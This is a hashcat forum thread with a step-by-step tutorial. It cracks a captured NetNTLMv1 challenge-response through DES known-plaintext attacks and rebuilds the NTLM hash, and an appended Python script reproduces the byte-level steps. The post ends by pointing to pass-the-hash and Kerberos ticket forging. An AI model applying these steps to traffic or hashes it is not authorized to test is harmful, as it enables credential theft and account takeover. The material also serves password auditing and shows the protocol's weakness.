atom (Administrator, Posts: 5,075, Threads: 226, Joined: Apr 2010) #1
Just wanted to make a quick writeup on how to use the new DES KPA cracking mode. An interesting example, I thought, would be how to retrieve the NTLM out of a captured NetNTLMv1 session. It doesn't matter if you were the server enforcing some challenge or if you sniffed it from the wire.



Note: The way we do it here will also work for cracking MSCHAPv2 or WPA2 Enterprise.



So, basically what we're looking for in NetNTLMv1 is the challenge and a 24 byte bytestream. To get them you can use metasploit or other tools, but I don't want to focus on that here. For details on how to get them, check out this page: https://crack.sh/mschapv2.html



You end up in a string that looks like the following: $99$ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw=



First we need to decode the base64, remove the $99$ signature, and do this:



Code:
root@et:~/hashcat# echo -n 'ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw=' | base64 -d | xxd
00000000: 1122 3344 5566 7788 727b 4e35 f947 129e ."3DUfw.r{N5.G..
00000010: a52b 9cde dae8 6934 586c .+....i4Xl
root@et:~/hashcat#

The first 8 bytes are the challenge, which will be our data part in the DES cracking later.



The next 16 bytes are 2 of 3 DES-encrypted messages. If we manage to crack both of them, we can reconstruct the NTLM out of it. This is our goal, and it's guaranteed; it will just take some time.



The next 2 bytes are the decrypted message of the third DES message. So yes, this one is already cracked, which was possible because the search space is pretty small (0x10000). We don't need to crack this anymore. Note: This will be the last 2 bytes of the final NTLM.

If you're interested in a detailed analysis of this, check this page: http://davenport.sourceforge.net/ntlm.ht...lmResponse



So we end up with the following information:

CT1: 727b4e35f947129e
CT2: a52b9cdedae86934
PT3: 586c
CHAL: 1122334455667788

Now, to hashcat. We want to crack CT1 and CT2. Luckily, both have been generated with the same plaintext message (challenge). This means that we can multihash attack them. We will crack both for the price of one. From a math perspective, the keyspace to search is 2^56, not 2*(2^56).



To make use of hashcat's DES KPA cracking we just need two pieces of information: the ciphertext and the plaintext. Both must be exactly 8 bytes. Both need to be given in hex notation. So the hashes look like this:



Code:
root@et:~/hashcat# cat hashes.txt
727b4e35f947129e:1122334455667788
a52b9cdedae86934:1122334455667788
root@et:~/hashcat#

And that's it basically. Now we can start hashcat with this:



Code:
root@et:~/hashcat# ./hashcat -m 14000 hashes.txt -o cracked.txt -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3
...
root@et:~/hashcat#

Some explanations about the command line:

-1 charsets/DES_full.charset: this charset was added to GitHub with a recent commit, and I recommend using it whenever you're cracking a full DES range.

?1?1?1?1?1?1?1?1: the length is always (and exactly) 8 bytes.

When hashcat is finished you will find the entries in cracked.txt:



Code:
root@et:~/hashcat# cat cracked.txt
727b4e35f947129e:1122334455667788:$HEX[8923bdfdaf753f63]
a52b9cdedae86934:1122334455667788:$HEX[17d741d7ddc1c36f]
root@et:~/hashcat#

Now that we've cracked the DES keys, we need to decode them back to plain data. I've written a small program, "deskey_to_ntlm.pl", to do that; it's part of hashcat-utils now: https://github.com/hashcat/hashcat-utils...to_ntlm.pl



Code:
root@et:~/hashcat-utils/src# perl deskey_to_ntlm.pl 8923bdfdaf753f63
8846f7eaee8fb1
root@et:~/hashcat-utils/src# perl deskey_to_ntlm.pl 17d741d7ddc1c36f
17ad06bdd830b7
root@et:~/hashcat-utils/src#

Now you can put the substrings together to get the final NTLM:



8846f7eaee8fb117ad06bdd830b7586c



As proof that all the above worked correctly: I knew that the NTLM password was "password":



Code:
root@ht:~/hashcat-utils/src# echo -n password | iconv -f utf8 -t utf16le | openssl dgst -md4
(stdin)= 8846f7eaee8fb117ad06bdd830b7586c
root@ht:~/hashcat-utils/src#

You know, once you have the NTLM hash, you can do all the funny things like PTH or generate a kerberos ticket out of it or simply crack the NTLM.



- atom
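The post walks through the NetNTLMv1 layout by hand and relies on deskey_to_ntlm.pl for the key conversion. The following script is an added example (not code from the thread, from hashcat or from hashcat-utils) that reproduces each step in plain Python on the thread's own sample values: it parses the $99$ blob into challenge, CT1, CT2 and PT3, emits the -m 14000 hash lines, strips the DES parity bits back to the 7-byte NTLM halves, and reassembles the NTLM. It also implements the forward direction (NTLM, zero-padded to 21 bytes, cut into three DES keys), which makes visible why the third block carries only two real key bytes and is therefore handed over already cracked. Function names are my own; DES itself is not run here, the thread's openssl dgst -md4 line remains the independent check.

```python
"""Added example, not part of the thread or of hashcat-utils.

NetNTLMv1 response = DES(K1, chal) || DES(K2, chal) || DES(K3, chal), where
K1..K3 are the three 7-byte chunks of NTLM || 00 00 00 00 00 (21 bytes).
The $99$ blob used in the thread packs chal || CT1 || CT2 || PT3, with PT3
being the two real bytes of K3 (only 2^16 candidates, so it is pre-cracked).
"""
import base64

# Constructed from the thread's sample; KNOWN_NTLM is the MD4 of the UTF-16LE
# encoding of "password" quoted at the end of the post.
SAMPLE_BLOB = "$99$ESIzRFVmd4hye041+UcSnqUrnN7a6Gk0WGw="
KNOWN_NTLM = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")


def parse_99_blob(blob: str) -> dict:
    """Split a $99$ string into challenge, the two DES ciphertexts and the
    already-recovered 2-byte plaintext of the third DES block."""
    if not blob.startswith("$99$"):
        raise ValueError("missing $99$ signature")
    raw = base64.b64decode(blob[4:])
    if len(raw) != 26:
        raise ValueError(f"expected 26 bytes, got {len(raw)}")
    return {
        "challenge": raw[0:8],   # DES plaintext shared by both KPA targets
        "ct1": raw[8:16],        # DES(K1, challenge)
        "ct2": raw[16:24],       # DES(K2, challenge)
        "pt3": raw[24:26],       # NTLM bytes 14..15, already brute-forced
    }


def hashcat_14000_lines(parsed: dict) -> list:
    """Hash lines for hashcat -m 14000: <ciphertext>:<plaintext>, both hex."""
    chal = parsed["challenge"].hex()
    return [f"{parsed['ct1'].hex()}:{chal}", f"{parsed['ct2'].hex()}:{chal}"]


def deskey_to_ntlm(key: bytes) -> bytes:
    """Inverse of the DES key expansion (what deskey_to_ntlm.pl does): keep
    the top 7 bits of each of the 8 key bytes and repack them into 7 bytes."""
    if len(key) != 8:
        raise ValueError("DES key must be 8 bytes")
    bits = 0
    for b in key:
        bits = (bits << 7) | (b >> 1)   # drop the parity bit (ignored by DES)
    return bits.to_bytes(7, "big")


def ntlm_to_des_keys(ntlm: bytes) -> list:
    """Forward direction used by NetNTLMv1: NTLM || 5 zero bytes -> three
    7-byte chunks -> three 8-byte DES keys with odd parity in the low bit.
    hashcat's $HEX[...] output above happens to set every low bit to 1;
    both forms denote the same 56-bit key."""
    if len(ntlm) != 16:
        raise ValueError("NTLM hash must be 16 bytes")
    padded = ntlm + b"\x00" * 5
    keys = []
    for i in range(0, 21, 7):
        chunk = int.from_bytes(padded[i:i + 7], "big")
        key = bytearray()
        for shift in range(49, -1, -7):          # eight 7-bit groups, MSB first
            seven = (chunk >> shift) & 0x7F
            parity = 0 if bin(seven).count("1") % 2 else 1
            key.append((seven << 1) | parity)
        keys.append(bytes(key))
    return keys


def rebuild_ntlm(key1: bytes, key2: bytes, pt3: bytes) -> bytes:
    """Concatenate the two recovered 7-byte halves and the 2-byte tail."""
    return deskey_to_ntlm(key1) + deskey_to_ntlm(key2) + pt3


if __name__ == "__main__":
    parsed = parse_99_blob(SAMPLE_BLOB)
    print("\n".join(hashcat_14000_lines(parsed)))
    # The two DES keys hashcat reported in the thread.
    k1 = bytes.fromhex("8923bdfdaf753f63")
    k2 = bytes.fromhex("17d741d7ddc1c36f")
    ntlm = rebuild_ntlm(k1, k2, parsed["pt3"])
    print("NTLM:", ntlm.hex(), "matches known:", ntlm == KNOWN_NTLM)
    # K3 derived from the known NTLM: only bytes 14..15 are non-zero.
    print("K3 material:", deskey_to_ntlm(ntlm_to_des_keys(KNOWN_NTLM)[2]).hex())
```

The forward function is the part worth reading from the defender's side: the 16-byte hash is spread over 56 + 56 + 16 key bits that each encrypt the same known plaintext, so the strength of the whole exchange is a single 2^56 DES search regardless of password length, which is the reason the thread's multihash run recovers both halves in one pass.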





mubix (Junior Member, Posts: 1, Threads: 0, Joined: Sep 2016) #2

Awesome stuff! Thanks for making this happen atom. Really appreciate it.